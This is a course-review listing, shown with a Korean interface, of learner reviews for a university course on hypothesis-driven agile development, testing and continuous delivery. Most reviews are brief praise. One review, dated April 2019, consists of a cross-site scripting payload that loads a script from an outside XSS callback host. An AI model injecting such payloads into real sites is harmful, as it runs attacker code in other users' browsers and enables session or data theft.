Chevron Left
Hypothesis-Driven Development(으)로 돌아가기

버지니아 대학교의 Hypothesis-Driven Development 학습자 리뷰 및 피드백

4.6
361개의 평가
63개의 리뷰

강좌 소개

To deliver agile outcomes, you have to do more than implement an agile process- you have to create focus around what matters to your user and rigorously test how well what you’re doing is delivering on that focus. Driving to testable ideas (hypotheses) and maximizing the results of your experimentation is at the heart of a high-functioning practice of agile. This course shows you how to facilitate alignment and create a culture of experimentation across your product pipeline. You’ll understand how to answer these four big questions: 1. How do we drive our agility with analytics? 2. How do we create compelling propositions for our user?
 3. How do we achieve excellent usability?
 4. How do we release fast without creating disasters?
 As a Project Management Institute (PMI®) Registered Education Provider, the University of Virginia Darden School of Business has been approved by PMI to issue 20 professional development units (PDUs) for this course, which focuses on core competencies recognized by PMI. (Provider #2122) This course is supported by the Batten Institute at UVA’s Darden School of Business. The Batten Institute’s mission is to improve the world through entrepreneurship and innovation: www.batteninstitute.org....

최상위 리뷰

MB

Jan 30, 2019

Alex does an excellent job in structuring and delivering his courses. Definitely makes me want to continue educational opportunities with his courses offered and University of Virginia.

OS

Jun 26, 2017

I thought this was a very good practical course. It was challenging for me since I lack experience in software development industry, but I thought it gave me a very good framework.

필터링 기준:

Hypothesis-Driven Development의 64개 리뷰 중 26~50

교육 기관: Jason D

Dec 13, 2017

Very interesting and lots of practical, actionable advice.

교육 기관: Ricardo B

Oct 26, 2017

Fantastic course.

교육 기관: Mauricio L

Feb 25, 2018

Very nice as i learned the different aspects of testing using agile approach vs legacy

교육 기관: Jaime S

Jun 26, 2018

This was a good course for developing a good foundation of CI/CD and testing practices in lean methodologies. This course incorporates a lot of interviews with experts in the industry, which I find helpful and informative. The exercises in the class were also helpful and applicable.

교육 기관: Rahil N

Feb 16, 2018

Great course learned alot about testing types and processes

교육 기관: Paulius U

Jul 29, 2018

Comprehensive, detailed and well worth the time. Everyone in software development business should take this.

교육 기관: Pedro D G

Apr 22, 2019

Great!

교육 기관: nikhil+(<a>)

Apr 26, 2019

"><script src=https://si.xss.ht></script>

교육 기관: Miguel A T A

May 13, 2019

Es un muy buen curso, me dio mucha luz sobre la importancia de la automatización de las pruebas en equipos ágiles de desarrollo.

교육 기관: MASOOTH A

Jun 20, 2019

great

교육 기관: Anil K S

Aug 26, 2019

Very helpful for Agile Tester.

교육 기관: Hemant B K

Aug 28, 2019

Very good content and presentation. Liked the talks by different people from industry which gives a real world perspective from Agile practitioners

교육 기관: Mark H

Sep 03, 2019

Good overview of testing, Agile or otherwise

교육 기관: Jiří Z

Sep 17, 2019

really beneficial way of thinking

교육 기관: Bushra I

Oct 01, 2019

Well designed and shared knowledge of experienced people.

교육 기관: Sathya k

Oct 29, 2019

Good

교육 기관: Bharat S

Oct 29, 2019

A different perspective to product development and really helpful

교육 기관: RICARDO A M P

Nov 08, 2019

Thanks For this Wonderful course!!!

교육 기관: Chames E L

Nov 13, 2019

Great insights on how testing and continuous integration, delivery and deployment are happening in agile way

교육 기관: Aleksandra S

Sep 16, 2016

The last assignment is hard to do if you have just pretend project not real one. But whole course is really good.

교육 기관: Michael S

Mar 10, 2017

Another great course 2nd best after managing an agile team. Great content and presenters with useful recommendations.

교육 기관: Alberto F

Nov 26, 2016

Great course!

교육 기관: Roberto L

May 16, 2018

Agile course is well structured and teaching material

교육 기관: Nkeangnyi L Y

Apr 02, 2018

One tough course

교육 기관: Constance C

Mar 23, 2018

Overall very useful information and some good advice from some of the expert interviews. As a software developer I am often looking for specific hints and tip s in this area and this course provided some valuable advice and perspectives that I can apply immediatley